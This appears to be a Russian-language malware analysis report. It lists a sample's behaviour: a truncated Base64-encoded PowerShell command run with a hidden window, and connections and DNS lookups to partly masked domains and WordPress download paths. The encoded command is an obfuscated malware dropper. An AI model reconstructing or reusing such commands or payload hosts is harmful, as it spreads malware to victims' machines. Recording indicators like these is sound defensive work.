Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAEwAQwBVAFUAZgBoAGQAPQAnAFcASwBXAEYAUgBzAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAYABVAHIAaQB0AHkAcABgAFIAbwB0AE8AYwBvAEwAIgAgAD...
- 'st####zrenner.com':80
- http://sa####market.com/wp-includes/W1V/
- http://pr#####beforebuying.com/wordpress/nx5RXviWhv/
- DNS ASK st##data.it
- DNS ASK sa####market.com
- DNS ASK pr#####beforebuying.com
- DNS ASK ma######ektrik.mbakluli.com
- DNS ASK st####zrenner.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABJAEwAQwBVAFUAZgBoAGQAPQAnAFcASwBXAEYAUgBzAGQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAYABVAHIAaQB0AHkAcABgAFIAbwB0AE8AYwBvAEwAIgAgAD...' (со скрытым окном)